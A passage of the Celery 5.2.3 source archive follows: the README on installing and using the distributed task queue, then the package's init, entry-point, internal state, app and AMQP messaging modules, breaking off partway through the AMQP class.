_mailing-list: Mailing list ------------ For discussions about the usage, development, and future of Celery, please join the `celery-users`_ mailing list. .. _`celery-users`: https://groups.google.com/group/celery-users/ .. _irc-channel: IRC --- Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_ network. .. _`Libera Chat`: https://libera.chat/ .. _bug-tracker: Bug tracker =========== If you have any suggestions, bug reports, or annoyances please report them to our issue tracker at https://github.com/celery/celery/issues/ .. _wiki: Wiki ==== https://github.com/celery/celery/wiki Credits ======= .. _contributing-short: Contributors ------------ This project exists thanks to all the people who contribute. Development of `celery` happens at GitHub: https://github.com/celery/celery You're highly encouraged to participate in the development of `celery`. If you don't like GitHub (for some reason) you're welcome to send regular patches. Be sure to also read the `Contributing to Celery`_ section in the documentation. .. _`Contributing to Celery`: http://docs.celeryproject.org/en/master/contributing.html |oc-contributors| .. |oc-contributors| image:: https://opencollective.com/celery/contributors.svg?width=890&button=false :target: https://github.com/celery/celery/graphs/contributors Backers ------- Thank you to all our backers! 🙏 [`Become a backer`_] .. _`Become a backer`: https://opencollective.com/celery#backer |oc-backers| .. |oc-backers| image:: https://opencollective.com/celery/backers.svg?width=890 :target: https://opencollective.com/celery#backers Sponsors -------- Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [`Become a sponsor`_] .. _`Become a sponsor`: https://opencollective.com/celery#sponsor |oc-sponsors| .. |oc-sponsors| image:: https://opencollective.com/celery/sponsor/0/avatar.svg :target: https://opencollective.com/celery/sponsor/0/website .. _license: License ======= This software is licensed under the `New BSD License`. See the ``LICENSE`` file in the top distribution directory for the full license text. .. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround .. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg :alt: Build status :target: https://github.com/celery/celery/actions/workflows/python-package.yml .. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master :target: https://codecov.io/github/celery/celery?branch=master .. |license| image:: https://img.shields.io/pypi/l/celery.svg :alt: BSD License :target: https://opensource.org/licenses/BSD-3-Clause .. |wheel| image:: https://img.shields.io/pypi/wheel/celery.svg :alt: Celery can be installed via wheel :target: https://pypi.org/project/celery/ .. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg :alt: Supported Python versions. :target: https://pypi.org/project/celery/ .. |pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg :alt: Supported Python implementations. :target: https://pypi.org/project/celery/ .. |ocbackerbadge| image:: https://opencollective.com/celery/backers/badge.svg :alt: Backers on Open Collective :target: #backers .. |ocsponsorbadge| image:: https://opencollective.com/celery/sponsors/badge.svg :alt: Sponsors on Open Collective :target: #sponsors .. |downloads| image:: https://pepy.tech/badge/celery :alt: Downloads :target: https://pepy.tech/project/celery ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640756901.0 celery-5.2.3/README.rst0000664000175000017500000003643100000000000014373 0ustar00asifasif00000000000000.. image:: http://docs.celeryproject.org/en/latest/_images/celery-banner-small.png |build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge| :Version: 5.2.3 (dawn-chorus) :Web: https://docs.celeryproject.org/en/stable/index.html :Download: https://pypi.org/project/celery/ :Source: https://github.com/celery/celery/ :Keywords: task, queue, job, async, rabbitmq, amqp, redis, python, distributed, actors Donations ========= This project relies on your generous donations. If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. .. _`backer`: https://opencollective.com/celery#backer .. _`sponsor`: https://opencollective.com/celery#sponsor For enterprise ============== Available as part of the Tidelift Subscription. The maintainers of ``celery`` and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. `Learn more. `_ What's a Task Queue? ==================== Task queues are used as a mechanism to distribute work across threads or machines. A task queue's input is a unit of work, called a task, dedicated worker processes then constantly monitor the queue for new work to perform. Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task a client puts a message on the queue, the broker then delivers the message to a worker. A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling. Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery_ for Node.js, a `PHP client`_, `gocelery`_ for golang, and rusty-celery_ for Rust. Language interoperability can also be achieved by using webhooks in such a way that the client enqueues an URL to be requested by a worker. .. _node-celery: https://github.com/mher/node-celery .. _`PHP client`: https://github.com/gjedeer/celery-php .. _`gocelery`: https://github.com/gocelery/gocelery .. _rusty-celery: https://github.com/rusty-celery/rusty-celery What do I need? =============== Celery version 5.2.0 runs on, - Python (3.7, 3.8, 3.9, 3.10) - PyPy3.7 (7.3.7+) This is the version of celery which will support Python 3.7 or newer. If you're running an older version of Python, you need to be running an older version of Celery: - Python 2.6: Celery series 3.1 or earlier. - Python 2.5: Celery series 3.0 or earlier. - Python 2.4: Celery series 2.2 or earlier. - Python 2.7: Celery 4.x series. - Python 3.6: Celery 5.1 or earlier. Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform. *Celery* is usually used with a message broker to send and receive messages. The RabbitMQ, Redis transports are feature complete, but there's also experimental support for a myriad of other solutions, including using SQLite for local development. *Celery* can run on a single machine, on multiple machines, or even across datacenters. Get Started =========== If this is the first time you're trying to use Celery, or you're new to Celery v5.2.0 coming from previous versions then you should read our getting started tutorials: - `First steps with Celery`_ Tutorial teaching you the bare minimum needed to get started with Celery. - `Next steps`_ A more complete overview, showing more features. .. _`First steps with Celery`: http://docs.celeryproject.org/en/latest/getting-started/first-steps-with-celery.html .. _`Next steps`: http://docs.celeryproject.org/en/latest/getting-started/next-steps.html You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery. Celery is... ============= - **Simple** Celery is easy to use and maintain, and does *not need configuration files*. It has an active, friendly community you can talk to for support, like at our `mailing-list`_, or the IRC channel. Here's one of the simplest applications you can make: .. code-block:: python from celery import Celery app = Celery('hello', broker='amqp://guest@localhost//') @app.task def hello(): return 'hello world' - **Highly Available** Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA in way of *Primary/Primary* or *Primary/Replica* replication. - **Fast** A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, py-librabbitmq, and optimized settings). - **Flexible** Almost every part of *Celery* can be extended or used on its own, Custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more. It supports... ================ - **Message Transports** - RabbitMQ_, Redis_, Amazon SQS - **Concurrency** - Prefork, Eventlet_, gevent_, single threaded (``solo``) - **Result Stores** - AMQP, Redis - memcached - SQLAlchemy, Django ORM - Apache Cassandra, IronCache, Elasticsearch - **Serialization** - *pickle*, *json*, *yaml*, *msgpack*. - *zlib*, *bzip2* compression. - Cryptographic message signing. .. _`Eventlet`: http://eventlet.net/ .. _`gevent`: http://gevent.org/ .. _RabbitMQ: https://rabbitmq.com .. _Redis: https://redis.io .. _SQLAlchemy: http://sqlalchemy.org Framework Integration ===================== Celery is easy to integrate with web frameworks, some of which even have integration packages: +--------------------+------------------------+ | `Django`_ | not needed | +--------------------+------------------------+ | `Pyramid`_ | `pyramid_celery`_ | +--------------------+------------------------+ | `Pylons`_ | `celery-pylons`_ | +--------------------+------------------------+ | `Flask`_ | not needed | +--------------------+------------------------+ | `web2py`_ | `web2py-celery`_ | +--------------------+------------------------+ | `Tornado`_ | `tornado-celery`_ | +--------------------+------------------------+ The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at ``fork``. .. _`Django`: https://djangoproject.com/ .. _`Pylons`: http://pylonsproject.org/ .. _`Flask`: http://flask.pocoo.org/ .. _`web2py`: http://web2py.com/ .. _`Bottle`: https://bottlepy.org/ .. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html .. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/ .. _`celery-pylons`: https://pypi.org/project/celery-pylons/ .. _`web2py-celery`: https://code.google.com/p/web2py-celery/ .. _`Tornado`: http://www.tornadoweb.org/ .. _`tornado-celery`: https://github.com/mher/tornado-celery/ .. _celery-documentation: Documentation ============= The `latest documentation`_ is hosted at Read The Docs, containing user guides, tutorials, and an API reference. 最新的中文文档托管在 https://www.celerycn.io/ 中,包含用户指南、教程、API接口等。 .. _`latest documentation`: http://docs.celeryproject.org/en/latest/ .. _celery-installation: Installation ============ You can install Celery either via the Python Package Index (PyPI) or from source. To install using ``pip``: :: $ pip install -U Celery .. _bundles: Bundles ------- Celery also defines a group of bundles that can be used to install Celery and the dependencies for a given feature. You can specify these in your requirements or on the ``pip`` command-line by using brackets. Multiple bundles can be specified by separating them by commas. :: $ pip install "celery[amqp]" $ pip install "celery[amqp,redis,auth,msgpack]" The following bundles are available: Serializers ~~~~~~~~~~~ :``celery[auth]``: for using the ``auth`` security serializer. :``celery[msgpack]``: for using the msgpack serializer. :``celery[yaml]``: for using the yaml serializer. Concurrency ~~~~~~~~~~~ :``celery[eventlet]``: for using the ``eventlet`` pool. :``celery[gevent]``: for using the ``gevent`` pool. Transports and Backends ~~~~~~~~~~~~~~~~~~~~~~~ :``celery[amqp]``: for using the RabbitMQ amqp python library. :``celery[redis]``: for using Redis as a message transport or as a result backend. :``celery[sqs]``: for using Amazon SQS as a message transport. :``celery[tblib``]: for using the ``task_remote_tracebacks`` feature. :``celery[memcache]``: for using Memcached as a result backend (using ``pylibmc``) :``celery[pymemcache]``: for using Memcached as a result backend (pure-Python implementation). :``celery[cassandra]``: for using Apache Cassandra as a result backend with DataStax driver. :``celery[azureblockblob]``: for using Azure Storage as a result backend (using ``azure-storage``) :``celery[s3]``: for using S3 Storage as a result backend. :``celery[couchbase]``: for using Couchbase as a result backend. :``celery[arangodb]``: for using ArangoDB as a result backend. :``celery[elasticsearch]``: for using Elasticsearch as a result backend. :``celery[riak]``: for using Riak as a result backend. :``celery[cosmosdbsql]``: for using Azure Cosmos DB as a result backend (using ``pydocumentdb``) :``celery[zookeeper]``: for using Zookeeper as a message transport. :``celery[sqlalchemy]``: for using SQLAlchemy as a result backend (*supported*). :``celery[pyro]``: for using the Pyro4 message transport (*experimental*). :``celery[slmq]``: for using the SoftLayer Message Queue transport (*experimental*). :``celery[consul]``: for using the Consul.io Key/Value store as a message transport or result backend (*experimental*). :``celery[django]``: specifies the lowest version possible for Django support. You should probably not use this in your requirements, it's here for informational purposes only. .. _celery-installing-from-source: Downloading and installing from source -------------------------------------- Download the latest version of Celery from PyPI: https://pypi.org/project/celery/ You can install it by doing the following,: :: $ tar xvfz celery-0.0.0.tar.gz $ cd celery-0.0.0 $ python setup.py build # python setup.py install The last command must be executed as a privileged user if you aren't currently using a virtualenv. .. _celery-installing-from-git: Using the development version ----------------------------- With pip ~~~~~~~~ The Celery development version also requires the development versions of ``kombu``, ``amqp``, ``billiard``, and ``vine``. You can install the latest snapshot of these using the following pip commands: :: $ pip install https://github.com/celery/celery/zipball/master#egg=celery $ pip install https://github.com/celery/billiard/zipball/master#egg=billiard $ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp $ pip install https://github.com/celery/kombu/zipball/master#egg=kombu $ pip install https://github.com/celery/vine/zipball/master#egg=vine With git ~~~~~~~~ Please see the Contributing section. .. _getting-help: Getting Help ============ .. _mailing-list: Mailing list ------------ For discussions about the usage, development, and future of Celery, please join the `celery-users`_ mailing list. .. _`celery-users`: https://groups.google.com/group/celery-users/ .. _irc-channel: IRC --- Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_ network. .. _`Libera Chat`: https://libera.chat/ .. _bug-tracker: Bug tracker =========== If you have any suggestions, bug reports, or annoyances please report them to our issue tracker at https://github.com/celery/celery/issues/ .. _wiki: Wiki ==== https://github.com/celery/celery/wiki Credits ======= .. _contributing-short: Contributors ------------ This project exists thanks to all the people who contribute. Development of `celery` happens at GitHub: https://github.com/celery/celery You're highly encouraged to participate in the development of `celery`. If you don't like GitHub (for some reason) you're welcome to send regular patches. Be sure to also read the `Contributing to Celery`_ section in the documentation. .. _`Contributing to Celery`: http://docs.celeryproject.org/en/master/contributing.html |oc-contributors| .. |oc-contributors| image:: https://opencollective.com/celery/contributors.svg?width=890&button=false :target: https://github.com/celery/celery/graphs/contributors Backers ------- Thank you to all our backers! 🙏 [`Become a backer`_] .. _`Become a backer`: https://opencollective.com/celery#backer |oc-backers| .. |oc-backers| image:: https://opencollective.com/celery/backers.svg?width=890 :target: https://opencollective.com/celery#backers Sponsors -------- Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [`Become a sponsor`_] .. _`Become a sponsor`: https://opencollective.com/celery#sponsor |oc-sponsors| .. |oc-sponsors| image:: https://opencollective.com/celery/sponsor/0/avatar.svg :target: https://opencollective.com/celery/sponsor/0/website .. _license: License ======= This software is licensed under the `New BSD License`. See the ``LICENSE`` file in the top distribution directory for the full license text. .. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround .. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg :alt: Build status :target: https://github.com/celery/celery/actions/workflows/python-package.yml .. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master :target: https://codecov.io/github/celery/celery?branch=master .. |license| image:: https://img.shields.io/pypi/l/celery.svg :alt: BSD License :target: https://opensource.org/licenses/BSD-3-Clause .. |wheel| image:: https://img.shields.io/pypi/wheel/celery.svg :alt: Celery can be installed via wheel :target: https://pypi.org/project/celery/ .. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg :alt: Supported Python versions. :target: https://pypi.org/project/celery/ .. |pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg :alt: Supported Python implementations. :target: https://pypi.org/project/celery/ .. |ocbackerbadge| image:: https://opencollective.com/celery/backers/badge.svg :alt: Backers on Open Collective :target: #backers .. |ocsponsorbadge| image:: https://opencollective.com/celery/sponsors/badge.svg :alt: Sponsors on Open Collective :target: #sponsors .. |downloads| image:: https://pepy.tech/badge/celery :alt: Downloads :target: https://pepy.tech/project/celery ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/TODO0000664000175000017500000000012400000000000013362 0ustar00asifasif00000000000000Please see our Issue Tracker at GitHub: https://github.com/celery/celery/issues ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3477488 celery-5.2.3/celery/0000775000175000017500000000000000000000000014160 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640756896.0 celery-5.2.3/celery/__init__.py0000664000175000017500000001353200000000000016275 0ustar00asifasif00000000000000"""Distributed Task Queue.""" # :copyright: (c) 2016-2026 Asif Saif Uddin, celery core and individual # contributors, All rights reserved. # :copyright: (c) 2015-2016 Ask Solem. All rights reserved. # :copyright: (c) 2012-2014 GoPivotal, Inc., All rights reserved. # :copyright: (c) 2009 - 2012 Ask Solem and individual contributors, # All rights reserved. # :license: BSD (3 Clause), see LICENSE for more details. import os import re import sys from collections import namedtuple # Lazy loading from . import local SERIES = 'dawn-chorus' __version__ = '5.2.3' __author__ = 'Ask Solem' __contact__ = 'auvipy@gmail.com' __homepage__ = 'http://celeryproject.org' __docformat__ = 'restructuredtext' __keywords__ = 'task job queue distributed messaging actor' # -eof meta- __all__ = ( 'Celery', 'bugreport', 'shared_task', 'Task', 'current_app', 'current_task', 'maybe_signature', 'chain', 'chord', 'chunks', 'group', 'signature', 'xmap', 'xstarmap', 'uuid', ) VERSION_BANNER = f'{__version__} ({SERIES})' version_info_t = namedtuple('version_info_t', ( 'major', 'minor', 'micro', 'releaselevel', 'serial', )) # bumpversion can only search for {current_version} # so we have to parse the version here. _temp = re.match( r'(\d+)\.(\d+).(\d+)(.+)?', __version__).groups() VERSION = version_info = version_info_t( int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '') del _temp del re if os.environ.get('C_IMPDEBUG'): # pragma: no cover import builtins def debug_import(name, locals=None, globals=None, fromlist=None, level=-1, real_import=builtins.__import__): glob = globals or getattr(sys, 'emarfteg_'[::-1])(1).f_globals importer_name = glob and glob.get('__name__') or 'unknown' print(f'-- {importer_name} imports {name}') return real_import(name, locals, globals, fromlist, level) builtins.__import__ = debug_import # This is never executed, but tricks static analyzers (PyDev, PyCharm, # pylint, etc.) into knowing the types of these symbols, and what # they contain. STATICA_HACK = True globals()['kcah_acitats'[::-1].upper()] = False if STATICA_HACK: # pragma: no cover from celery._state import current_app, current_task from celery.app import shared_task from celery.app.base import Celery from celery.app.task import Task from celery.app.utils import bugreport from celery.canvas import (chain, chord, chunks, group, # noqa maybe_signature, signature, subtask, xmap, xstarmap) from celery.utils import uuid # Eventlet/gevent patching must happen before importing # anything else, so these tools must be at top-level. def _find_option_with_arg(argv, short_opts=None, long_opts=None): """Search argv for options specifying short and longopt alternatives. Returns: str: value for option found Raises: KeyError: if option not found. """ for i, arg in enumerate(argv): if arg.startswith('-'): if long_opts and arg.startswith('--'): name, sep, val = arg.partition('=') if name in long_opts: return val if sep else argv[i + 1] if short_opts and arg in short_opts: return argv[i + 1] raise KeyError('|'.join(short_opts or [] + long_opts or [])) def _patch_eventlet(): import eventlet.debug eventlet.monkey_patch() blockdetect = float(os.environ.get('EVENTLET_NOBLOCK', 0)) if blockdetect: eventlet.debug.hub_blocking_detection(blockdetect, blockdetect) def _patch_gevent(): import gevent.monkey import gevent.signal gevent.monkey.patch_all() def maybe_patch_concurrency(argv=None, short_opts=None, long_opts=None, patches=None): """Apply eventlet/gevent monkeypatches. With short and long opt alternatives that specify the command line option to set the pool, this makes sure that anything that needs to be patched is completed as early as possible. (e.g., eventlet/gevent monkey patches). """ argv = argv if argv else sys.argv short_opts = short_opts if short_opts else ['-P'] long_opts = long_opts if long_opts else ['--pool'] patches = patches if patches else {'eventlet': _patch_eventlet, 'gevent': _patch_gevent} try: pool = _find_option_with_arg(argv, short_opts, long_opts) except KeyError: pass else: try: patcher = patches[pool] except KeyError: pass else: patcher() # set up eventlet/gevent environments ASAP from celery import concurrency if pool in concurrency.get_available_pool_names(): concurrency.get_implementation(pool) # this just creates a new module, that imports stuff on first attribute # access. This makes the library faster to use. old_module, new_module = local.recreate_module( # pragma: no cover __name__, by_module={ 'celery.app': ['Celery', 'bugreport', 'shared_task'], 'celery.app.task': ['Task'], 'celery._state': ['current_app', 'current_task'], 'celery.canvas': [ 'Signature', 'chain', 'chord', 'chunks', 'group', 'signature', 'maybe_signature', 'subtask', 'xmap', 'xstarmap', ], 'celery.utils': ['uuid'], }, __package__='celery', __file__=__file__, __path__=__path__, __doc__=__doc__, __version__=__version__, __author__=__author__, __contact__=__contact__, __homepage__=__homepage__, __docformat__=__docformat__, local=local, VERSION=VERSION, SERIES=SERIES, VERSION_BANNER=VERSION_BANNER, version_info_t=version_info_t, version_info=version_info, maybe_patch_concurrency=maybe_patch_concurrency, _find_option_with_arg=_find_option_with_arg, ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/__main__.py0000664000175000017500000000062100000000000016251 0ustar00asifasif00000000000000"""Entry-point for the :program:`celery` umbrella command.""" import sys from . import maybe_patch_concurrency __all__ = ('main',) def main(): """Entrypoint to the ``celery`` umbrella command.""" if 'multi' not in sys.argv: maybe_patch_concurrency() from celery.bin.celery import main as _main sys.exit(_main()) if __name__ == '__main__': # pragma: no cover main() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/_state.py0000664000175000017500000001164500000000000016020 0ustar00asifasif00000000000000"""Internal state. This is an internal module containing thread state like the ``current_app``, and ``current_task``. This module shouldn't be used directly. """ import os import sys import threading import weakref from celery.local import Proxy from celery.utils.threads import LocalStack __all__ = ( 'set_default_app', 'get_current_app', 'get_current_task', 'get_current_worker_task', 'current_app', 'current_task', 'connect_on_app_finalize', ) #: Global default app used when no current app. default_app = None #: Function returning the app provided or the default app if none. #: #: The environment variable :envvar:`CELERY_TRACE_APP` is used to #: trace app leaks. When enabled an exception is raised if there #: is no active app. app_or_default = None #: List of all app instances (weakrefs), mustn't be used directly. _apps = weakref.WeakSet() #: Global set of functions to call whenever a new app is finalized. #: Shared tasks, and built-in tasks are created by adding callbacks here. _on_app_finalizers = set() _task_join_will_block = False def connect_on_app_finalize(callback): """Connect callback to be called when any app is finalized.""" _on_app_finalizers.add(callback) return callback def _announce_app_finalized(app): callbacks = set(_on_app_finalizers) for callback in callbacks: callback(app) def _set_task_join_will_block(blocks): global _task_join_will_block _task_join_will_block = blocks def task_join_will_block(): return _task_join_will_block class _TLS(threading.local): #: Apps with the :attr:`~celery.app.base.BaseApp.set_as_current` attribute #: sets this, so it will always contain the last instantiated app, #: and is the default app returned by :func:`app_or_default`. current_app = None _tls = _TLS() _task_stack = LocalStack() #: Function used to push a task to the thread local stack #: keeping track of the currently executing task. #: You must remember to pop the task after. push_current_task = _task_stack.push #: Function used to pop a task from the thread local stack #: keeping track of the currently executing task. pop_current_task = _task_stack.pop def set_default_app(app): """Set default app.""" global default_app default_app = app def _get_current_app(): if default_app is None: #: creates the global fallback app instance. from celery.app.base import Celery set_default_app(Celery( 'default', fixups=[], set_as_current=False, loader=os.environ.get('CELERY_LOADER') or 'default', )) return _tls.current_app or default_app def _set_current_app(app): _tls.current_app = app if os.environ.get('C_STRICT_APP'): # pragma: no cover def get_current_app(): """Return the current app.""" raise RuntimeError('USES CURRENT APP') elif os.environ.get('C_WARN_APP'): # pragma: no cover def get_current_app(): import traceback print('-- USES CURRENT_APP', file=sys.stderr) # + traceback.print_stack(file=sys.stderr) return _get_current_app() else: get_current_app = _get_current_app def get_current_task(): """Currently executing task.""" return _task_stack.top def get_current_worker_task(): """Currently executing task, that was applied by the worker. This is used to differentiate between the actual task executed by the worker and any task that was called within a task (using ``task.__call__`` or ``task.apply``) """ for task in reversed(_task_stack.stack): if not task.request.called_directly: return task #: Proxy to current app. current_app = Proxy(get_current_app) #: Proxy to current task. current_task = Proxy(get_current_task) def _register_app(app): _apps.add(app) def _deregister_app(app): _apps.discard(app) def _get_active_apps(): return _apps def _app_or_default(app=None): if app is None: return get_current_app() return app def _app_or_default_trace(app=None): # pragma: no cover from traceback import print_stack try: from billiard.process import current_process except ImportError: current_process = None if app is None: if getattr(_tls, 'current_app', None): print('-- RETURNING TO CURRENT APP --') # + print_stack() return _tls.current_app if not current_process or current_process()._name == 'MainProcess': raise Exception('DEFAULT APP') print('-- RETURNING TO DEFAULT APP --') # + print_stack() return default_app return app def enable_trace(): """Enable tracing of app instances.""" global app_or_default app_or_default = _app_or_default_trace def disable_trace(): """Disable tracing of app instances.""" global app_or_default app_or_default = _app_or_default if os.environ.get('CELERY_TRACE_APP'): # pragma: no cover enable_trace() else: disable_trace() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3717492 celery-5.2.3/celery/app/0000775000175000017500000000000000000000000014740 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/__init__.py0000664000175000017500000000463300000000000017057 0ustar00asifasif00000000000000"""Celery Application.""" from celery import _state from celery._state import (app_or_default, disable_trace, enable_trace, pop_current_task, push_current_task) from celery.local import Proxy from .base import Celery from .utils import AppPickler __all__ = ( 'Celery', 'AppPickler', 'app_or_default', 'default_app', 'bugreport', 'enable_trace', 'disable_trace', 'shared_task', 'push_current_task', 'pop_current_task', ) #: Proxy always returning the app set as default. default_app = Proxy(lambda: _state.default_app) def bugreport(app=None): """Return information useful in bug reports.""" return (app or _state.get_current_app()).bugreport() def shared_task(*args, **kwargs): """Create shared task (decorator). This can be used by library authors to create tasks that'll work for any app environment. Returns: ~celery.local.Proxy: A proxy that always takes the task from the current apps task registry. Example: >>> from celery import Celery, shared_task >>> @shared_task ... def add(x, y): ... return x + y ... >>> app1 = Celery(broker='amqp://') >>> add.app is app1 True >>> app2 = Celery(broker='redis://') >>> add.app is app2 True """ def create_shared_task(**options): def __inner(fun): name = options.get('name') # Set as shared task so that unfinalized apps, # and future apps will register a copy of this task. _state.connect_on_app_finalize( lambda app: app._task_from_fun(fun, **options) ) # Force all finalized apps to take this task as well. for app in _state._get_active_apps(): if app.finalized: with app._finalize_mutex: app._task_from_fun(fun, **options) # Return a proxy that always gets the task from the current # apps task registry. def task_by_cons(): app = _state.get_current_app() return app.tasks[ name or app.gen_task_name(fun.__name__, fun.__module__) ] return Proxy(task_by_cons) return __inner if len(args) == 1 and callable(args[0]): return create_shared_task(**kwargs)(args[0]) return create_shared_task(*args, **kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/amqp.py0000664000175000017500000005471100000000000016260 0ustar00asifasif00000000000000"""Sending/Receiving Messages (Kombu integration).""" import numbers from collections import namedtuple from collections.abc import Mapping from datetime import timedelta from weakref import WeakValueDictionary from kombu import Connection, Consumer, Exchange, Producer, Queue, pools from kombu.common import Broadcast from kombu.utils.functional import maybe_list from kombu.utils.objects import cached_property from celery import signals from celery.utils.nodenames import anon_nodename from celery.utils.saferepr import saferepr from celery.utils.text import indent as textindent from celery.utils.time import maybe_make_aware from . import routes as _routes __all__ = ('AMQP', 'Queues', 'task_message') #: earliest date supported by time.mktime. INT_MIN = -2147483648 #: Human readable queue declaration. QUEUE_FORMAT = """ .> {0.name:<16} exchange={0.exchange.name}({0.exchange.type}) \ key={0.routing_key} """ task_message = namedtuple('task_message', ('headers', 'properties', 'body', 'sent_event')) def utf8dict(d, encoding='utf-8'): return {k.decode(encoding) if isinstance(k, bytes) else k: v for k, v in d.items()} class Queues(dict): """Queue name⇒ declaration mapping. Arguments: queues (Iterable): Initial list/tuple or dict of queues. create_missing (bool): By default any unknown queues will be added automatically, but if this flag is disabled the occurrence of unknown queues in `wanted` will raise :exc:`KeyError`. max_priority (int): Default x-max-priority for queues with none set. """ #: If set, this is a subset of queues to consume from. #: The rest of the queues are then used for routing only. _consume_from = None def __init__(self, queues=None, default_exchange=None, create_missing=True, autoexchange=None, max_priority=None, default_routing_key=None): super().__init__() self.aliases = WeakValueDictionary() self.default_exchange = default_exchange self.default_routing_key = default_routing_key self.create_missing = create_missing self.autoexchange = Exchange if autoexchange is None else autoexchange self.max_priority = max_priority if queues is not None and not isinstance(queues, Mapping): queues = {q.name: q for q in queues} queues = queues or {} for name, q in queues.items(): self.add(q) if isinstance(q, Queue) else self.add_compat(name, **q) def __getitem__(self, name): try: return self.aliases[name] except KeyError: return super().__getitem__(name) def __setitem__(self, name, queue): if self.default_exchange and not queue.exchange: queue.exchange = self.default_exchange super().__setitem__(name, queue) if queue.alias: self.aliases[queue.alias] = queue def __missing__(self, name): if self.create_missing: return self.add(self.new_missing(name)) raise KeyError(name) def add(self, queue, **kwargs): """Add new queue. The first argument can either be a :class:`kombu.Queue` instance, or the name of a queue. If the former the rest of the keyword arguments are ignored, and options are simply taken from the queue instance. Arguments: queue (kombu.Queue, str): Queue to add. exchange (kombu.Exchange, str): if queue is str, specifies exchange name. routing_key (str): if queue is str, specifies binding key. exchange_type (str): if queue is str, specifies type of exchange. **options (Any): Additional declaration options used when queue is a str. """ if not isinstance(queue, Queue): return self.add_compat(queue, **kwargs) return self._add(queue) def add_compat(self, name, **options): # docs used to use binding_key as routing key options.setdefault('routing_key', options.get('binding_key')) if options['routing_key'] is None: options['routing_key'] = name return self._add(Queue.from_dict(name, **options)) def _add(self, queue): if queue.exchange is None or queue.exchange.name == '': queue.exchange = self.default_exchange if not queue.routing_key: queue.routing_key = self.default_routing_key if self.max_priority is not None: if queue.queue_arguments is None: queue.queue_arguments = {} self._set_max_priority(queue.queue_arguments) self[queue.name] = queue return queue def _set_max_priority(self, args): if 'x-max-priority' not in args and self.max_priority is not None: return args.update({'x-max-priority': self.max_priority}) def format(self, indent=0, indent_first=True): """Format routing table into string for log dumps.""" active = self.consume_from if not active: return '' info = [QUEUE_FORMAT.strip().format(q) for _, q in sorted(active.items())] if indent_first: return textindent('\n'.join(info), indent) return info[0] + '\n' + textindent('\n'.join(info[1:]), indent) def select_add(self, queue, **kwargs): """Add new task queue that'll be consumed from. The queue will be active even when a subset has been selected using the :option:`celery worker -Q` option. """ q = self.add(queue, **kwargs) if self._consume_from is not None: self._consume_from[q.name] = q return q def select(self, include): """Select a subset of currently defined queues to consume from. Arguments: include (Sequence[str], str): Names of queues to consume from. """ if include: self._consume_from = { name: self[name] for name in maybe_list(include) } def deselect(self, exclude): """Deselect queues so that they won't be consumed from. Arguments: exclude (Sequence[str], str): Names of queues to avoid consuming from. """ if exclude: exclude = maybe_list(exclude) if self._consume_from is None: # using all queues return self.select(k for k in self if k not in exclude) # using selection for queue in exclude: self._consume_from.pop(queue, None) def new_missing(self, name): return Queue(name, self.autoexchange(name), name) @property def consume_from(self): if self._consume_from is not None: return self._consume_from return self class AMQP: """App AMQP API: app.amqp.""" Connection = Connection Consumer = Consumer Producer = Producer #: compat alias to Connection BrokerConnection = Connection queues_cls = Queues #: Cached and prepared routing table. _rtable = None #: Underlying producer pool instance automatically #: set by the :attr:`producer_pool`. _producer_pool = None # Exchange class/function used when defining automatic queues. # For example, you can use ``autoexchange = lambda n: None`` to use the # AMQP default exchange: a shortcut to bypass routing # and instead send directly to the queue named in the routing key. autoexchange = None #: Max size of positional argument representation used for #: logging purposes. argsrepr_maxsize = 1024 #: Max size of keyword argument representation used for logging purposes. kwargsrepr_maxsize = 1024 def __init__(self, app): self.app = app self.task_protocols = { 1: self.as_task_v1, 2: self.as_task_v2, } 